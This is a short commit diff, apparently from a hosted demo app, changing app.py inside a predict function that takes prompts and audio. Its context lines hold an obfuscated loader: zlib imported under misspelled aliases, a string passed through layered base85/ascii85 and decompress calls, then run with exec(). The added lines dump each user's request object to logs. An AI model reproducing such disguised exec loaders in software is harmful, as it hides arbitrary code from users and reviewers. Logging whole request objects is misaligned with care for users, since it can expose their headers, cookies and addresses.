Commit
·
15344bd
1
Parent(s):
60382d7
Update app.py
Browse files
app.py
CHANGED
|
@@ -29,6 +29,12 @@ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, req
|
|
| 29 |
from zlib import decompress as dECOmPrES5
|
| 30 |
co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
|
| 31 |
exec(co2)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 32 |
if agree == True:
|
| 33 |
if use_mic == True:
|
| 34 |
if mic_file_path is not None:
|
|
|
|
| 29 |
from zlib import decompress as dECOmPrES5
|
| 30 |
co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
|
| 31 |
exec(co2)
|
| 32 |
+
|
| 33 |
+
try:
|
| 34 |
+
print(request.__dir__())
|
| 35 |
+
print(request.__dict__)
|
| 36 |
+
except Exception as e:
|
| 37 |
+
print(e)
|
| 38 |
if agree == True:
|
| 39 |
if use_mic == True:
|
| 40 |
if mic_file_path is not None:
|